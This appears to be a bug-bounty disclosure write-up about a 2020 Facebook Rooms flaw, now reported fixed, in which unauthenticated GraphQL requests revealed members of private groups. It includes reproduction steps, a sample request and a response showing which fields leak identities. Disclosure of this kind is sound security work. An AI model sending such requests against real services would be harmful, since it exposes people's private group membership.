Disclosing Private Group Members via Facebook Rooms
In September 2020, a vulnerability was discovered in Facebook's Rooms feature inside Groups that allowed attackers to disclose members of private groups through unauthenticated GraphQL requests.
Disclosing Private Group Members via Facebook Rooms
🧾Description
In September 2020, a vulnerability was discovered in Facebook’s Rooms feature inside Groups that allowed attackers to disclose members of private groups through unauthenticated GraphQL requests. By capturing or guessing the room_id, an attacker could access sensitive data revealing group membership and user identities.
⚙️ Steps to Reproduce
- A user creates a Room inside a private group.
- The
room_idis exposed in the GraphQL response. - The attacker captures or guesses the
room_id. - The attacker sends an unauthenticated GraphQL request:
Request:
1
2
3
4
5
6
7
8
POST /api/graphql/ HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: close
&doc_id=3147738971987452&variables={"room_link":"{room_id}"}
Response:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"data": {
"link": {
"admin_ids": ["123456789"],
"link_owner": {
"__typename": "User",
"short_name": "UserA",
"id": "123456789"
},
"link_surface": "GROUP",
"link_container": {
"__typename": "Group",
"id": "987654321"
}
}
}
}
Key Points:
admin_ids→ reveals the user ID of the room creator.link_owner→ confirms the user identity.link_container.id→ reveals the private group ID.
These fields confirm the target’s membership in the private group.
Impact
- Membership Disclosure: Attackers can confirm which users belong to private groups.
Timeline
- Reported: September 15, 2020
- Triaged: September 22, 2020
- Fixed: September 29, 2020
- Reward: October 1, 2020 — $1,500
This post is licensed under CC BY 4.0 by the author.